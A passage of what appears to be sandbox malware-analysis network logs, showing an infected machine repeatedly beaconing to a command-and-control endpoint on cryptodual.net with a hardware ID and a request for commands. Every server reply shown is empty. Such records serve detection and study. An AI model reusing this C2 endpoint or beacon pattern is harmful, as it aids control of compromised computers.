                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:15.338135004 CET1353INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770372d1f0000d6d94e9e4000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oVRPSpr19so6TgvflduQAb%2Bmv7%2FbCInxopio6p%2FtmlOwtU9riY%2FOZAmb7154c9Ex0haFeQ7fPrv%2FNFrhUzZec8IpDOI%2BYBF6xwmZFPJ4lQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f48e9d68d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:15.339893103 CET1353OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:15.422821045 CET1355INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770372d730000d6d949ab6000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=su0v1GD2h6oZYXlq2AT4iwQfYAoEkwjH7kJ3D9oPdefp%2BEnkf9Esnxloo2vShvKRxdiC926ieX6bQDlsFHpOI%2Fe7WbQCf61WfeScqKZOJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f48f1ea2d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:15.425206900 CET1355OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:15.504051924 CET1358INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770372dc60000d6d90dacf000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aBPdcnJ%2F1Zu3WCALo4f00WmCdQOXl5YCd59rd%2BwGfZ55uYpKPoqvvI0b%2BHt909uLQfltCJgB05XXrCvXvHkpCmcNndfYcFLryToEQE5Hfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f48fafa8d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:20.524226904 CET1358OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:20.604468107 CET1360INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703741b40000d6d946870000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xW41p99c9M4qWqngSEt2LH7ZVUKmsAqL%2BIU8CQ%2FwV128xYzevHd658xqYsc0jDMYGOseUBWqOtEfm%2FDd2KqvKJNJGzvdGA5W5dJeULrRGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4af8cffd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:20.608154058 CET1360OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:20.684782028 CET1362INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703742060000d6d9fb962000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yeMI0l9RAZkBxH0yH99S0oL%2B8%2BHiEmNc2ZVR6z5NY3y5AO6Zf3uSFq1ZNKU2d5OhK1cj6DMVRtUKcnQuHQ44Dv17yN9049Nt5IQDTDXBrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4b00e49d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:20.688240051 CET1363OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:20.778718948 CET1364INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                x-powered-by: PHP/7.0.33
                                                                x-turbo-charged-by: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703742550000d6d940b0c000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=s%2FuBmSLjUtk4DKsqE%2FljhoGUM1VwCETGpFVbRgexaObwoo76kAgYVv2uK%2B%2FkH63EkYQ4KE02GWsCP7zqcukSW7W%2F6GsravJbT1Irh%2FHEsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4b08fa9d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:20.781972885 CET1365OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:20.867063999 CET1366INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703742b30000d6d9f98f8000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RqcNQOjH%2FKAEp9pICAeI4AB%2FTbXQar2ea1pNFiN7SDEGNaDT0J3cbmMz%2F4F%2Fls3EeOpKRqHFVxRc9uzTsXGq4d2PltccVKiDVT%2FuUYV%2B0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4b118e2d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:25.871639013 CET1368OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:25.957973957 CET1369INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703756950000d6d93d2a0000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WlvSQGj3NPiMVZ5SQl3OmQiCETjjVbQ%2FaABM0OM4f2tnohMYRtu6B%2BIiyYCq1Yd8dWqS6ufTk1JERrdVnbF1xgIPv7NTPqLvUypt2vwF%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4d0ef10d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:25.960122108 CET1370OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:26.038851976 CET1371INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703756ee0000d6d961b7f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZPK2OPkfvFgBijwj8cem%2F7lm9ugygk7s1uHaV%2BQBZFL9u%2Fa9lQlNUcQ6mcxyWSTuc8QdjONrgDtqLGwoBYWBJ2M3TbgqxcZTohQjAizBaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4d1783fd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:26.040878057 CET1372OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:26.129098892 CET1373INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                x-powered-by: PHP/7.0.33
                                                                x-turbo-charged-by: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037573e0000d6d95804b000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2QnINgmcWz7dlsDKRZwAZwR2%2B7JTZtiGfRG1VMyhVITgX2rBGnJeVD2ldAC6527JPnIDaDAWKjGP25bHurZmfiXQbzbuziKcQSxhrlBfug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4d1f9a9d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:26.131248951 CET1374OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:26.303484917 CET1374INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037579a0000d6d9179bd000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=u8G2%2Bk7ijOqv1V8TEF0fxa%2Fi%2BdWHrIcuPRvFuHgKVG6RRqdtnOE0vxifnYhRQWvoekdAOo4UnwQt9wtoJxYOrfT1Rc4AolpIUTT4LDi3pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4d28b00d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:31.638736963 CET1377OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:31.730308056 CET1379INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770376d1c0000d6d942848000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=iUnfvLxS1EcRLArSisN2qO1W%2FUg%2F02fDT9vPCEWgWNv9%2FLOHD6mlATFzHMmdXeKa%2Fan0RIvPs3q7ypUhRFxZI5tq%2FBeCTwSJsCGO%2BJJkQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4f4ff00d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:31.733062029 CET1379OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:31.818725109 CET1380INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770376d7d0000d6d96eb21000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=GVMGdnowVG04%2Bp8x5I94G5x89%2FT3MCnaF%2FpMDR2qPrAIi2bfUZ7ETSX9IqU7Qu6u1%2Bf3TdAU6oMgNPiegADmXuA1Ihi6ybRIfWYnTpJziw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4f5981ad6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:31.821297884 CET1381OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:31.896210909 CET1381INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770376dd30000d6d96f313000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ic4w%2BDC3UpNQ9H6A7BfdfS46Bqq7sEJXSeZuXoqpPcSRwf3%2B7pjnYChQNVx%2BHZcWg1QLuFPoSP4qIv04sv26G7RKTNebdEgKIkrCVs7opw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4f61919d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:31.899070024 CET1382OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:31.976599932 CET1382INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770376e200000d6d941356000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SdKWYcL2HyvAsaMM3%2FKHBalSEHk2dbt0afk0z6JDD5fRlXTDhl7qmovHWQjEA66hGkUJTeaDDbkFMJsGnUK6SO8YMOsWV7fvItaTfoFV%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4f69a12d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:36.984596014 CET1386OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:37.062094927 CET1387INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703781fe0000d6d90c95e000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=drythXUkXeaFiujYhRNxcdJV%2FELlVPJz1zsrBvFtAHFs7Bs7bkgHq1sGeT1pLmySQyj2JF3TUynCFt5vwHTs2hJ%2BWANxTQ8jiV7yjwN9mQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f5166808d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:37.065628052 CET1388OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:37.140665054 CET1388INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703782500000d6d92a830000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sIdv%2BIy0VCur7Z0XVmEMtQynrP2AsCNrgSMgjdW2dBQyPPJBTov%2BkoVz9fRhSRk8%2BJlQOXqx83Xp0uOjGu96thJeq3FLOBnBdlya4rcrjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f516e902d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:37.144450903 CET1389OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:37.223587990 CET1389INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037829d0000d6d95a8ea000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fCWY1vcAqF8Ckfgn0cqrMS9J2FZod%2B%2FLmRRhwQ97Pv9MTUHYDHmRCn474r0KkOMgnsMM76K%2FfgGLxSKhe0J1UAkpmqt1oJtL3Nb1yLL0mQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f5176a16d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:37.227199078 CET1390OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:37.304352999 CET1390INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703782f30000d6d9641b2000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MdZWur8T4k4CIG9AuVPBbWoQVnnc7kXg02t9TvnGWkfUFiHp7QzS5PMJRaNQ%2BUMwyRfEbGtXoL7ihPLRAwju41wzk5cqE6CHw8pe%2FsNrTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f517eb58d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:42.314454079 CET1394OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:42.752201080 CET1395INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703796d00000d6d946bdf000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6lBSLeMcW7xdsJmQdcpsG3SNFZqx15r5LJcMt%2BkvmVJMETicgGGMgc1U89SaX8WLW8z1PzaSJeBbHwa31HMRka%2BkAIVNhFWuRAIZNdtX0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f537b81ad6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:42.754302979 CET1395OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:42.879127979 CET1396INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703798890000d6d95aa6a000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fsd6buSFvoVzRQ6KvrhQvQOHTdNQ5Ha7xeOCLgwS7gADsJPdOkJvpU2h9lPOwZZ%2FZaqiayvntBDyFZ8BXTOqF5feh3RWNfmbFm1Pf5mRrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f53a7e65d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:42.880933046 CET1397OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:42.961236954 CET1398INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703799070000d6d93d089000000001
